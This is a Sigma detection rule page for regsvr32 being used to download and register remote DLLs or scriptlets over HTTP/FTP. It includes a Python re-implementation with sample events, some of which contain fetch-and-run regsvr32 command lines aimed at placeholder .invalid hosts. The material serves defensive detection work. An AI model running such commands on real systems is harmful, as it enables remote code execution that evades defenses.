Potentially Suspicious Regsvr32 HTTP/FTP Pattern
Detects regsvr32 execution to download/install/register new DLLs that are hosted on Web or FTP servers.
Sigma rule
title: Potentially Suspicious Regsvr32 HTTP/FTP Pattern
id: 867356ee-9352-41c9-a8f2-1be690d78216
related:
    - id: 8e2b24c9-4add-46a0-b4bb-0057b4e6187d
      type: obsolete
status: test
description: Detects regsvr32 execution to download/install/register new DLLs that are hosted on Web or FTP servers.
references:
    - https://twitter.com/mrd0x/status/1461041276514623491
    - https://twitter.com/tccontre18/status/1480950986650832903
    - https://lolbas-project.github.io/lolbas/Binaries/Regsvr32/
author: Florian Roth (Nextron Systems)
date: 2023-05-24
modified: 2023-05-26
tags:
    - attack.defense-evasion
    - attack.t1218.010
logsource:
    category: process_creation
    product: windows
detection:
    selection_img:
        - Image|endswith: '\regsvr32.exe'
        - OriginalFileName: 'REGSVR32.EXE'
    selection_flag:
        CommandLine|contains:
            - ' /i'
            - ' -i'
    selection_protocol:
        CommandLine|contains:
            - 'ftp'
            - 'http'
    condition: all of selection_*
falsepositives:
    - Unknown
level: medium
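The rule's three selections, re-implemented in plain Python as an added example (this is not part of the Sigma rule or of SigmaHQ's own tooling) so the matching semantics can be exercised against constructed process-creation events. The field names image, command_line and original_file_name are assumed to map to the Sigma fields Image, CommandLine and OriginalFileName; all sample events, including the .invalid hostnames, are constructed. Event 4 illustrates one tuning point worth knowing about: because selection_protocol is a plain substring match on 'http' and 'ftp', a benign /i registration whose DLL path happens to contain one of those strings fires the rule too.

```python
"""Plain-Python re-implementation of the rule's detection logic.

Added example; not part of the Sigma rule or its page. Field names
(image, command_line, original_file_name) are assumed to map to the
Sigma process_creation fields Image, CommandLine, OriginalFileName.
The sample events below are constructed, not real telemetry.
"""
from dataclasses import dataclass


@dataclass
class ProcessCreation:
    image: str                     # Sigma: Image (full path of the executable)
    command_line: str              # Sigma: CommandLine
    original_file_name: str = ""   # Sigma: OriginalFileName (from PE version info)


def matches_rule(ev: ProcessCreation) -> bool:
    """Return True when 'all of selection_*' holds for this event.

    Sigma string matching is case-insensitive by default, so every
    comparison below is done on lower-cased values.
    """
    image = ev.image.lower()
    cmd = ev.command_line.lower()
    ofn = ev.original_file_name.lower()

    # selection_img is a list of two maps, i.e. an OR of the two tests
    selection_img = image.endswith("\\regsvr32.exe") or ofn == "regsvr32.exe"
    # selection_flag: CommandLine|contains any of ' /i', ' -i'
    selection_flag = " /i" in cmd or " -i" in cmd
    # selection_protocol: CommandLine|contains any of 'ftp', 'http'
    selection_protocol = "ftp" in cmd or "http" in cmd

    return selection_img and selection_flag and selection_protocol


# Constructed sample events (hostnames use the reserved .invalid TLD).
SAMPLE_EVENTS = [
    # 1: the pattern the rule targets: /i pointing at an http URL
    ProcessCreation(
        image=r"C:\Windows\System32\regsvr32.exe",
        command_line=r"regsvr32.exe /s /i:http://example.invalid/test.sct test.dll",
        original_file_name="REGSVR32.EXE",
    ),
    # 2: ordinary local registration, no /i and no URL -> must not fire
    ProcessCreation(
        image=r"C:\Windows\SysWOW64\regsvr32.exe",
        command_line=r'regsvr32.exe /s "C:\Program Files\Vendor\component.dll"',
        original_file_name="REGSVR32.EXE",
    ),
    # 3: renamed copy of the binary; only OriginalFileName gives it away
    ProcessCreation(
        image=r"C:\Users\Public\r.exe",
        command_line=r"r.exe -i:ftp://example.invalid/x.sct test.dll",
        original_file_name="REGSVR32.EXE",
    ),
    # 4: benign /i call whose DLL path merely contains the substring 'http'
    ProcessCreation(
        image=r"C:\Windows\System32\regsvr32.exe",
        command_line=r'regsvr32.exe /i "C:\Program Files\HttpClientTools\plugin.dll"',
        original_file_name="REGSVR32.EXE",
    ),
]


def evaluate(events):
    """Return a list of (command_line, matched) pairs, one per event."""
    return [(ev.command_line, matches_rule(ev)) for ev in events]


if __name__ == "__main__":
    for cmd, hit in evaluate(SAMPLE_EVENTS):
        print(f"{'ALERT' if hit else 'ok   '} {cmd}")
```

Lower-casing both sides mirrors Sigma's default case-insensitive string matching, which is why event 4's "HttpClientTools" path still satisfies selection_protocol; a backend that compiled the rule case-sensitively would behave differently from this reference implementation.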
Related rules
- DNS Query Request By Regsvr32.EXE
- HTML Help HH.EXE Suspicious Child Process
- Network Connection Initiated By Regsvr32.EXE
- Potential APT-C-12 BlueMushroom DLL Load Activity Via Regsvr32
- Potential EmpireMonkey Activity